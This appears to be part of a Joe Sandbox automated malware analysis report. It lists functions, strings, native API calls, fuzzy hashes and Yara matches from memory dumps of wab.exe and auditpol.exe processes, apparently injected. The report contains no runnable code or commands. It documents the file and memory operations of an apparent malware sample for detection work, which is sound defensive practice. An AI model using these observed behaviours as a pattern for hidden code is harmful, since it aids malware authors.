Strings

RTL: Re-Waiting, xrefs: 02EE7BAC
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 02EE7B7F
RTL: Resource at %p, xrefs: 02EE7B8E

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: fd5034db9cfefdf9b4991afb530c380b4d444d364afeb37fb23353ec5aa47682
Instruction ID: 1f110fb778728a56fd5ad4102b1de3f76cdef87874e880081b4782f5ebb0f16c
Opcode Fuzzy Hash: fd5034db9cfefdf9b4991afb530c380b4d444d364afeb37fb23353ec5aa47682
Instruction Fuzzy Hash: 1441E3353807029BDB20CE25CC60B6AB7E6EF94718F049A1DF95A9B680DB31F8058F91

Function 02EAB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EE728C

Strings

RTL: Re-Waiting, xrefs: 02EE72C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 02EE7294
RTL: Resource at %p, xrefs: 02EE72A3

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 7437cd6e2024a363916a4ebf816eed3625e8cfded54043c26d0106234bc9c8e8
Instruction ID: ec0430bfbdbc44c04e0626e513516727d0148a738121c4109068c4999f572147
Opcode Fuzzy Hash: 7437cd6e2024a363916a4ebf816eed3625e8cfded54043c26d0106234bc9c8e8
Instruction Fuzzy Hash: 6941F671680202ABDB21DE24CC41B66B7A5FF58718F10A619FD5ADB240EB21F841CBD1

Function 02EB7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 02EB7E8B

Strings

-, xrefs: 02EB7DDD
+, xrefs: 02EB7DE8

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: 134a44a8c2b4731fed37fe99f29a4dd7ce42ffe973da0a2ee607eeb0f65bc977
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 3591C672E802059ADF26DE69C8847FFF7A5AF84768F14E51AE855EB6C0D7308940CB14

Function 02E79126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 02E79191
@, xrefs: 02E79175

Memory Dump Source

Source File: 00000001.00000002.2015508341.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2e40000_wab.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 52536f62fe83c64a022d221f40f72d601a7f578479f2cb8f0e98e7e6aa893d6e
Instruction ID: e54edd1216d1a0e629729170791e3e6c2eb8c3bec7689062afaa2fd06f8891f3
Opcode Fuzzy Hash: 52536f62fe83c64a022d221f40f72d601a7f578479f2cb8f0e98e7e6aa893d6e
Instruction Fuzzy Hash: 31812B75D402699BDB35DB54CC44BEAB7B8AF08754F0091EAEA1DB7241E7309E81CFA0

Analysis Process: auditpol.exePID: 4008, Parent PID: 3196COMMON

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	3.9%
Signature Coverage:	2.1%
Total number of Nodes:	483
Total number of Limit Nodes:	79

Executed Functions

Function 029A9B30 Relevance: 25.3, Strings: 20, Instructions: 326
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

X, xrefs: 029A9C0E
M, xrefs: 029A9F2B
~f, xrefs: 029A9CBA
E, xrefs: 029A9D80
<i, xrefs: 029A9B91
R5, xrefs: 029A9B7C
b., xrefs: 029A9BE9
e, xrefs: 029A9C36
~f, xrefs: 029AA049
-, xrefs: 029A9CF0
}, xrefs: 029A9CFA
m, xrefs: 029A9C18
O3, xrefs: 029A9C8B
Lt, xrefs: 029A9BAD
(, xrefs: 029A9CE6
3, xrefs: 029A9D04
\f, xrefs: 029A9C6F
\, xrefs: 029A9DA2
x, xrefs: 029A9DC5
o, xrefs: 029A9D6C

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID:
String ID: X$($-$3$<i$E$Lt$M$O3$R5$\$\f$b.$o$x$}$~f$~f$e$m
API String ID: 0-1907792495
Opcode ID: 52fb260541c25b9e0845d284a2bf7f04e42e0b1c03dac85552afa8c598bc34d0
Instruction ID: 3baa56b744b798b342301c05b5657b668de9873a6d269afd9a05fd69c466080e
Opcode Fuzzy Hash: 52fb260541c25b9e0845d284a2bf7f04e42e0b1c03dac85552afa8c598bc34d0
Instruction Fuzzy Hash: C3128DB4D05228CFEB24CF44C9A47DDBBB2BF85308F1485D9C5496B281C7B95A89CF85

Function 029BC2D0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 029BC3B4
FindNextFileW.KERNELBASE(?,00000010), ref: 029BC3EF
FindClose.KERNELBASE(?), ref: 029BC3FA

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: c9c989ecc524a6890d189d71b6f18175a2dc95655850e4e636db6476a5f4f4db
Instruction ID: 63ba7344fc811ff2dd355fd5c48af5a908618106b5789a37f57de10e4969a1d1
Opcode Fuzzy Hash: c9c989ecc524a6890d189d71b6f18175a2dc95655850e4e636db6476a5f4f4db
Instruction Fuzzy Hash: 6A317071900348BFDB25EFA4CD85FEF77BDEF84704F144859B908A6180DA70AA85CBA5

Function 029C8DD0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 029C8ED1

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 3d1fc2d26a6fe2c72abb0635630b09c8bce2600f700067dc5871e2ef8bb59049
Instruction ID: 90f51a23e3b584bbc361b70757cc492abcf26f55bd80002e2ee7c77ae6f68f9b
Opcode Fuzzy Hash: 3d1fc2d26a6fe2c72abb0635630b09c8bce2600f700067dc5871e2ef8bb59049
Instruction Fuzzy Hash: 5131A5B5A01609AFDB14DF98D881EDEBBB9EF8C314F108219F919A7340D730A9518FA5

Function 029C8F40 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 029C9026

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: dcaf91bc8c402ae8d45016e9c45ae1fa76755063c1e4ecadf127d3dcb213a5b9
Instruction ID: fc8135c534ab8ee6080b203fa439b861aeb77adec5a508f8c684cb7f67e7426e
Opcode Fuzzy Hash: dcaf91bc8c402ae8d45016e9c45ae1fa76755063c1e4ecadf127d3dcb213a5b9
Instruction Fuzzy Hash: 6731C6B5A00608AFDB14DF98D881EEFB7F9AF8C314F108119F919A7340D770A9118FA5

Function 029C9250 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(029B19CE,?,029C7CEF,00000000,00000004,00003000,?,?,?,?,?,029C7CEF,029B19CE,89B44D8D,029B19CE,00000000), ref: 029C9318

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 57567f7fbdf172b997c5125451b425514f1c505d9c5131d3de21cc79c0d145eb
Instruction ID: a840343ab22d288127b4f99e1c99fbe56a4e39eed2f4709045071bbeda0fab50
Opcode Fuzzy Hash: 57567f7fbdf172b997c5125451b425514f1c505d9c5131d3de21cc79c0d145eb
Instruction Fuzzy Hash: CB21F9B5A00609AFDB14DF98DC81FEFBBB9EF88710F108109F918A7240D775A9118FA5

Function 029C9030 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 029C90C9

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 93c59168efad8e06436e875422b8f947ba548e2a5f8161d009c85e4dabe38818
Instruction ID: 9dc97a60cfa3678a05f3a0234cbea2bb57ee1318e8f0b6a3da878ff100fcd67e
Opcode Fuzzy Hash: 93c59168efad8e06436e875422b8f947ba548e2a5f8161d009c85e4dabe38818
Instruction Fuzzy Hash: 8C115171911608BED620EB58CC51FAFB7ADDFC9310F108109F91897281D77169068BE6

Function 029C90E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 029C9114

Memory Dump Source

Source File: 0000000A.00000002.4128710003.00000000029A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 029A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_29a0000_auditpol.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 3bd0b1cd51ec3253897aeea0e62ed861c48e2701c67753409419d919a5035729
Instruction ID: 74ab5c1388c4ff11dfd14cf00a28e37d48f7a2375eb32dc92d3837807c36287f
Opcode Fuzzy Hash: 3bd0b1cd51ec3253897aeea0e62ed861c48e2701c67753409419d919a5035729
Instruction Fuzzy Hash: D7E046362002087BC220AA5ACC40F9B77ADEBCA724F418019FA09A7240CA71B9028BE1

Function 03694340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0369434A

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e1b98b021df18135da00be3dae5c60b3600c9b19c3e532c5696e538994b3591e
Instruction ID: 04640f7d3804bbdd5f673beb575f07e13f926fcd09f721898f7c775b402e73aa
Opcode Fuzzy Hash: e1b98b021df18135da00be3dae5c60b3600c9b19c3e532c5696e538994b3591e
Instruction Fuzzy Hash: 1B900271B05C04129140B59C4884546440597E0301B55C011E1424654D8B549E565761

Function 03694650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0369465A

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2e1d849e486feedbeec9ba6f245bd72312002455000fa55bfc5a7ea185b5a3c
Instruction ID: e71d8728fac1e0cf37d74748b84396c6d35beacc6e799f74498fb267314d0614
Opcode Fuzzy Hash: a2e1d849e486feedbeec9ba6f245bd72312002455000fa55bfc5a7ea185b5a3c
Instruction Fuzzy Hash: 4A9002A1B01904424140B59C4804406640597E1301395C115A1554660D87589D559669

Function 036935C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036935CA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5371620dcb83670d91d6cf751653f16ed3aeb7d66eed5f108eac17132dd8765d
Instruction ID: 268cc9e023ff8571895a962f75d3744f0e17e22179ef1c57e12cecc2af54116a
Opcode Fuzzy Hash: 5371620dcb83670d91d6cf751653f16ed3aeb7d66eed5f108eac17132dd8765d
Instruction Fuzzy Hash: 78900271B0590802D100B59C4514706140587D0201F65C411A1424668E87D59E5169A2

Function 03692B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692B6A

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4e62a3d107746d6abe6006d622b0c27f46c7055899d1c9bb162567b4557393be
Instruction ID: 06123a916cd148755c5cf061c1f1c0fa54afd64b17da90b2276328008f4e68a7
Opcode Fuzzy Hash: 4e62a3d107746d6abe6006d622b0c27f46c7055899d1c9bb162567b4557393be
Instruction Fuzzy Hash: 279002A1702804034105B59C4414616440A87E0201B55C021E2014690EC6659D916525

Function 03692BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692BEA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e6e1a35abc7cc9e62f945e0b853c5470a612170f8b2c61dadcc60dad7955ce57
Instruction ID: eab28c88720ad3e0abf4a163e98e789265a19a17650080048cff15428d22f532
Opcode Fuzzy Hash: e6e1a35abc7cc9e62f945e0b853c5470a612170f8b2c61dadcc60dad7955ce57
Instruction Fuzzy Hash: 1690027170584C42D140B59C4404A46041587D0305F55C011A1064794E97659E55BA61

Function 03692BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692BFA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa3f57813e8bfc5aaa8e05ec6394d961d98af63313f027b2254cd68b537262a8
Instruction ID: 2be3a4c0e5ea30239dfb4cc3c2476eca94b65d3d09b907d8e97a72020150e911
Opcode Fuzzy Hash: fa3f57813e8bfc5aaa8e05ec6394d961d98af63313f027b2254cd68b537262a8
Instruction Fuzzy Hash: 2590027170180C02D180B59C440464A040587D1301F95C015A1025754ECB559F597BA1

Function 03692BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692BAA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a230b9ae70490954138cf67a17727297ca05d674cad443f41c4a1cb7c78455c7
Instruction ID: b7dfb8b20d480086912b2d1de8fbf1fb960c183f52c3f764923d60b2691c0316
Opcode Fuzzy Hash: a230b9ae70490954138cf67a17727297ca05d674cad443f41c4a1cb7c78455c7
Instruction Fuzzy Hash: E7900271B0580C02D150B59C4414746040587D0301F55C011A1024754E87959F557AA1

Function 03692AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692AFA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c7cd3f62fa971fda343fa0d485fc74da269138d845d7a8f7fd47d9eff0c588b6
Instruction ID: c96a5fec7fa8dd3ef92c3bb8899a3056de765b8ae4da6ca5fcf5a8c25458d973
Opcode Fuzzy Hash: c7cd3f62fa971fda343fa0d485fc74da269138d845d7a8f7fd47d9eff0c588b6
Instruction Fuzzy Hash: A3900265721804020145F99C060450B084597D6351395C015F2416690DC7619D655721

Function 03692AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692ADA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66b9e25d9dd41433c1cad2d04abfd8323d89be3857f1e0e59c4a58144e1146bf
Instruction ID: 9cf9d5511dc2309f146e4eac14c0471c60455a2b524958edcaeb14674c4f7261
Opcode Fuzzy Hash: 66b9e25d9dd41433c1cad2d04abfd8323d89be3857f1e0e59c4a58144e1146bf
Instruction Fuzzy Hash: 84900475711C04030105FDDC07045070447C7D5351355C031F3015750DD771DD715531

Function 036939B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 036939BA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 972eaf3553a8b2238049c2ee3dbff7d14011349bdee832d3e3156e68ce3070bd
Instruction ID: 1ebb529e92656a3ee3e804501f51fd1b0fd5a8f7c3055d2e34844ea0f636c94e
Opcode Fuzzy Hash: 972eaf3553a8b2238049c2ee3dbff7d14011349bdee832d3e3156e68ce3070bd
Instruction Fuzzy Hash: 0190026174585502D150B59C44046164405A7E0201F55C021A1814694E86959D556621

Function 03692F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692F3A

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34ee2812576ff607abef0454408e84b82dcd19fe8f442a81f5e517928254fa5b
Instruction ID: c0c3bd8179099b45069a0b157bb49c598e0e1f0fd9393fe81711070dc4a78ed8
Opcode Fuzzy Hash: 34ee2812576ff607abef0454408e84b82dcd19fe8f442a81f5e517928254fa5b
Instruction Fuzzy Hash: E69002A174180842D100B59C4414B060405C7E1301F55C015E2064654E8759DD526526

Function 03692FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692FEA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 94e08196e841b025d8c92ca666fc15ea6c31f4702c5a40910413f22a937b8f46
Instruction ID: f44feb9c6695e7e867094282780fbee2e904b131c312addf87e25bd8b9ae9b88
Opcode Fuzzy Hash: 94e08196e841b025d8c92ca666fc15ea6c31f4702c5a40910413f22a937b8f46
Instruction Fuzzy Hash: CF900261711C0442D200B9AC4C14B07040587D0303F55C115A1154654DCA559D615921

Function 03692FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692FBA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4979c1e07831e814a28e11ec0d19053d9bf1f1df924eacd38bcc35feaba03621
Instruction ID: 4496b6c93a9b9117a5fbc2ce41720106436b096121e9013d4f1a1e5d217a66e0
Opcode Fuzzy Hash: 4979c1e07831e814a28e11ec0d19053d9bf1f1df924eacd38bcc35feaba03621
Instruction Fuzzy Hash: 1F900261B01804424140B5AC88449064405ABE1211755C121A1998650E86999D655A65

Function 03692EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692EEA

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6547d15583e330366e6777bf959810d5ef4b004c79919b51d264a931da230d6
Instruction ID: 0adbe88614b7e56603bf5d30212ad3965685278e85115c118aa2c4f296edb442
Opcode Fuzzy Hash: a6547d15583e330366e6777bf959810d5ef4b004c79919b51d264a931da230d6
Instruction Fuzzy Hash: F79002A1701C0803D140B99C4804607040587D0302F55C011A3064655F8B699D516535

Function 03692E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03692E8A

Memory Dump Source

Source File: 0000000A.00000002.4129861712.0000000003620000.00000040.00001000.00020000.00000000.sdmp, Offset: 03620000, based on PE: true

Associated: 0000000A.00000002.4129861712.0000000003749000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.000000000374D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000A.00000002.4129861712.00000000037BE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_3620000_auditpol.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 54a96fbde5d87310053d2b853f09f8244a462613021231946f2bf872517b52f6
Instruction ID: 5a452779a404238832e2bc586ee6df381e9210b6077b357f83666c5cb23a31d4
Opcode Fuzzy Hash: 54a96fbde5d87310053d2b853f09f8244a462613021231946f2bf872517b52f6
Instruction Fuzzy Hash: F3900261B0180902D101B59C4404616040A87D0241F95C022A2024655FCB659E92A531

